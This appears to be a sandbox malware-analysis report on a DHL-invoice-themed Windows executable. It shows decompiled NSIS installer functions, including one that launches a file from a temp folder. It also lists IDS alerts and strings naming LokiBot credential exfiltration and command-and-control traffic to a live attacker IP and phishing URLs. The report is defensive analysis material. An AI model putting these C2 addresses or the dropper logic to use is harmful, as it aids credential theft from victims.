Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp$C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll
API String ID: 1659193697-195321724
Opcode ID: 880b6e8eb98c9848af5b495b6728ebb1dd9d1416f486c763179cba2b8671cfc5
Instruction ID: 711803fd364401e957546549a979f7dfd5371b874df28eda27acfe343a1b9a3f
Opcode Fuzzy Hash: 880b6e8eb98c9848af5b495b6728ebb1dd9d1416f486c763179cba2b8671cfc5
Instruction Fuzzy Hash: 9A112676A443116BD310AB618A8992FB7E4AF84354F15453FF905F31C1D7FC980183AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402077(intOrPtr _a8, signed char _a28, intOrPtr _a32, char _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char* _a80, signed char _a84, void* _a104, void* _a108) {
				void* _v12;
				intOrPtr _t19;
				void* _t31;
				void* _t37;
				void* _t38;
				void* _t42;

				_t31 = E0040303E(_t37, _t42);
				_t19 = E0040303E(_t37, 0x31);
				_t38 = E0040303E(_t37, 0x22);
				E0040303E(_t37, 0x15);
				E00405D3A(0xffffffec, "C:\Users\Arthur\AppData\Local\Temp\nsh6AA5.tmp\System.dll");
				_a64 = _a8;
				_a60 = _a32;
				_a84 = _a28;
				_a72 = _t19;
				_t25 =  !=  ? _t31 : 0;
				_a68 =  !=  ? _t31 : 0;
				_a80 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang";
				_t27 =  !=  ? _t38 : 0;
				_a76 =  !=  ? _t38 : 0;
				if(E004069F3( &_a56) != 0) {
					if((_a84 & 0x00000040) != 0) {
						E00406514(__ecx,  *((intOrPtr*)(__esp + 0x88)));
						_push( *((intOrPtr*)(__esp + 0x88)));
						CloseHandle();
					}
				}
				 *0x435ac8 =  *0x435ac8 + 1;
				return 0;
			}

0x0040207f
0x00402081
0x00402091
0x00402093
0x0040209f
0x004020ac
0x004020b2
0x004020ba
0x004020c1
0x004020c5
0x004020c8
0x004020d1
0x004020d9
0x004020dc
0x004020ec
0x004020f7
0x00402104
0x00402109
0x00402110
0x00402110
0x00402ea1
0x00402ea5
0x00402eb7

APIs

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02

Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040651E
Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548

CloseHandle.KERNEL32(?,?), ref: 00402110

Strings

C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll, xrefs: 00402098
@, xrefs: 004020F2
C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang, xrefs: 004020D1

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
String ID: @$C:\Users\user\AppData\Local\Temp\mnstring\Cirkusprogrammet\Lovgivningers\Wolfgang$C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll
API String ID: 4079680657-3479099472
Opcode ID: b86d3d0cfabebc589822062b709119d7a8bdb9eb276ec3d07a692ebc5b33ef99
Instruction ID: 7c7d4bc9f8110f395c3ef373be7a4f0c936d35dff6000358c7303bcbf620d08d
Opcode Fuzzy Hash: b86d3d0cfabebc589822062b709119d7a8bdb9eb276ec3d07a692ebc5b33ef99
Instruction Fuzzy Hash: 47118F716083809BC310AF61C98561BBBE5BF84349F00493EF595E72D1DBBC8845CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00403389 Relevance: 6.0, APIs: 4, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403389(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x40d970 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x435a00) {
							_t3 = CreateDialogParamW( *0x4349f4, 0x6f, 0, E0040364F, 0);
							 *0x40d970 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040620F(0);
					}
				} else {
					_t6 =  *0x40d970; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x40d970 =  *0x40d970 & 0x00000000;
					return _t6;
				}
			}

0x0040338e
0x004033af
0x004033b9
0x004033c5
0x004033d8
0x004033e1
0x00000000
0x004033e6
0x004033ec
0x004033b1
0x004033b8
0x004033b8
0x00403390
0x00403390
0x00403397
0x0040339a
0x0040339a
0x004033a0
0x004033a7
0x004033a7

APIs

DestroyWindow.USER32(00000000,00403579), ref: 0040339A
GetTickCount.KERNEL32 ref: 004033B9
CreateDialogParamW.USER32(0000006F,00000000,0040364F,00000000), ref: 004033D8
ShowWindow.USER32(00000000,00000005), ref: 004033E6

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
Instruction ID: 0c7035cfe5d59141003efccf1163e7ed1ec08c4572f7111a89f6d0b07e944292
Opcode Fuzzy Hash: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
Instruction Fuzzy Hash: 87F098B0981300BBEB24AF60EE4DB5A3AB8B744B03F800979F505B51E1DB795955DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00406977 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406977(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short* _a12, char* _a16, int _a20) {
				void* _v8;
				int _v12;
				void* _t20;
				char _t21;
				long _t24;
				char* _t28;

				_v12 = 0x800;
				asm("sbb eax, eax");
				_t20 = E004062D8(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_v8);
				_t28 = _a16;
				if(_t20 != 0) {
					L4:
					_t21 = 0;
					 *_t28 = 0;
				} else {
					_t24 = RegQueryValueExW(_v8, _a12, 0,  &_a20, _t28,  &_v12);
					RegCloseKey(_v8);
					_t21 = 0;
					_t28[0x7fe] = 0;
					if(_t24 != 0 || _a20 != 1 && _a20 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406980
0x0040698d
0x004069a0
0x004069a5
0x004069aa
0x004069e9
0x004069e9
0x004069eb
0x004069ac
0x004069be
0x004069c9
0x004069cf
0x004069d3
0x004069db
0x00000000
0x00000000
0x004069db
0x004069f0

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405FBE), ref: 004069BE
RegCloseKey.ADVAPI32(?), ref: 004069C9

Strings

Call, xrefs: 0040697C

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
Instruction ID: a3e06d51c6875ee3f629547af2dd4b96d71687c661178dbbbd55dab6437f425a
Opcode Fuzzy Hash: ef5c50818b295da6df722ea66ea55a7044f0b077f586aae140e4b9602ce783b5
Instruction Fuzzy Hash: D3010C7651010ABBDB218FA4DC06AEF7BA8EF45344F110126B901E2160D275DE60DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004058D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004058D0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t8;
				int _t11;
				int _t15;
				long _t16;

				_t16 = _a16;
				_t15 = _a8;
				_t8 = _t15;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						__eflags = _t8 - 0x419;
						if(_t8 != 0x419) {
							L9:
							return CallWindowProcW( *0x42dd64, _a4, _t15, _a12, _t16);
						}
						L7:
						__eflags =  *0x42ed68 - _t16; // 0x0
						if(__eflags != 0) {
							_push(_t16);
							_push(6);
							 *0x42ed68 = _t16;
							E004054B6();
						}
						goto L9;
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						goto L9;
					}
					_t16 = E004056DA(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L9;
				}
				E004054E8(0x413);
				return 0;
			}

0x004058d4
0x004058d8
0x004058db
0x004058e3
0x004058f9
0x004058ff
0x00405921
0x00405926
0x0040593e
0x00000000
0x0040594c
0x00405928
0x00405928
0x0040592e
0x00405930
0x00405931
0x00405933
0x00405939
0x00405939
0x00000000
0x0040592e
0x00405904
0x0040590a
0x0040590c
0x00000000
0x00000000
0x00405918
0x0040591a
0x00000000
0x0040591a
0x004058e9
0x00000000
0x00000000
0x004058f0
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405904
CallWindowProcW.USER32(?,?,?,?), ref: 0040594C

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

Strings

, xrefs: 004058E5

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
Instruction ID: 06e031647f3a40a893da8a12316d751141f27423df1ca697d7c88d312f012a23
Opcode Fuzzy Hash: ce6b446289bf2d1d80a1f39e5d6dd25478004387473800b399ee72f8fd73986e
Instruction Fuzzy Hash: 64018F72A00609FBEF305F51ED44A9B3A2AEB54760F104437F904B61E1C2798892DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405864 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00405864(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x435a28;
				_t10 =  *0x435a2c;
				__imp__OleInitialize(0);
				 *0x435a60 =  *0x435a60 | __eax;
				E004054E8(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					do {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) == 0) {
							goto L4;
						} else {
							_push(_v0);
							if(E00401399( *_t12) != 0) {
								 *0x435acc =  *0x435acc + 1;
							} else {
								goto L4;
							}
						}
						goto L7;
						L4:
						_t12 = _t12 + 0x818;
					} while (_t10 != 0);
				}
				L7:
				E004054E8(0x404);
				__imp__OleUninitialize();
				return  *0x435acc;
			}

0x00405865
0x0040586c
0x00405874
0x0040587a
0x00405882
0x00405889
0x0040588b
0x0040588e
0x0040588e
0x00405893
0x00000000
0x00405895
0x00405895
0x004058a2
0x004058b0
0x00000000
0x00000000
0x00000000
0x004058a2
0x00000000
0x004058a4
0x004058a4
0x004058aa
0x004058ae
0x004058b6
0x004058bb
0x004058c0
0x004058cd

APIs

OleInitialize.OLE32(00000000), ref: 00405874

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

OleUninitialize.OLE32(00000404,00000000), ref: 004058C0

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Preblesses Setup: Installing, xrefs: 00405864

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Preblesses Setup: Installing
API String ID: 1011633862-3179584722
Opcode ID: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
Instruction ID: 6162ea9da32c9538b6d8593dc8e66a114e5892011aec6599076d88f80df4c0eb
Opcode Fuzzy Hash: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
Instruction Fuzzy Hash: C5F0FA33500A009AF711B715AC02B6B73A8EB84705F08813EEE48A22A2E77948409B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040620F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620F(int _a4) {
				struct tagMSG _v32;
				int _t6;

				while(1) {
					_t2 =  &_a4; // 0x403579
					_t6 = PeekMessageW( &_v32, 0, _a4,  *_t2, "true");
					if(_t6 == 0) {
						break;
					}
					DispatchMessageW( &_v32);
				}
				return _t6;
			}

0x00406221
0x00406223
0x0040622f
0x00406237
0x00000000
0x00000000
0x0040621b
0x0040621b
0x0040623a

APIs

DispatchMessageW.USER32(?), ref: 0040621B
PeekMessageW.USER32(?,00000000,?,y5@,?), ref: 0040622F

Strings

y5@, xrefs: 00406223

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Message$DispatchPeek
String ID: y5@
API String ID: 1770753511-1888225771
Opcode ID: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
Instruction ID: a24ec92ef1b44bd1206bcd030c3399a913cbf723d0e0f52077422d22942c0190
Opcode Fuzzy Hash: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
Instruction Fuzzy Hash: 41D0127194020ABBEF10AFE0DD09F9A7B6CAB54744F008475B701B5091D678D5258B59

Uniqueness

Uniqueness Score: -1.00%

Function 00406D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406D10(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t8;

				_t8 = _a4;
				_t5 =  &(_t8[lstrlenW(_t8)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t8);
					_t5 = CharPrevW();
					if(_t5 > _t8) {
						continue;
					}
					break;
				}
				 *_t5 = 0;
				return  &(_t5[1]);
			}

0x00406d11
0x00406d1c
0x00406d1f
0x00406d25
0x00406d26
0x00406d27
0x00406d2f
0x00000000
0x00000000
0x00000000
0x00406d2f
0x00406d33
0x00406d3a

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403458,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,80000000,00000003,?,?,?,?,?), ref: 00406D16
CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D27

Strings

C:\Users\user\Desktop, xrefs: 00406D10

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
Instruction ID: 44824fea6f3b9252f25675ab164e3effdf97f7511deaacd8752cc1a9fc297a0b
Opcode Fuzzy Hash: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
Instruction Fuzzy Hash: CBD05E31102531ABCB126B18DC059AF77B8EF41300306886AE542E7164C7785D92CBAD

Uniqueness

Uniqueness Score: -1.00%

Source: http://216.128.145.196/~wellseconds/?p=43026970	Avira URL Cloud: Label: phishing
Source: http://216.128.145.196/~wellseconds/?p=43026970V	Avira URL Cloud: Label: phishing
Source: http://216-128-145-196.cprapid.com/~wellseconds/wp-json/	Avira URL Cloud: Label: phishing

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49832 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49832 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49832 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49833 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49833 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49833 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49835 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49835 -> 216.128.145.196:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49835 -> 216.128.145.196:80

Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.0000000002989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://216-128-145-196.cprapid.com/~wellseconds/wp-json/
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://216.128.145.196/~wellseconds/?p=43026970
Source: DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://216.128.145.196/~wellseconds/?p=43026970V
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: DHL_#U53d1#U7968.exe, 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11435219266.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11429104865.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11428499825.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11434514071.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, DHL_#U53d1#U7968.exe, 00000002.00000003.11469478376.00000000029C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
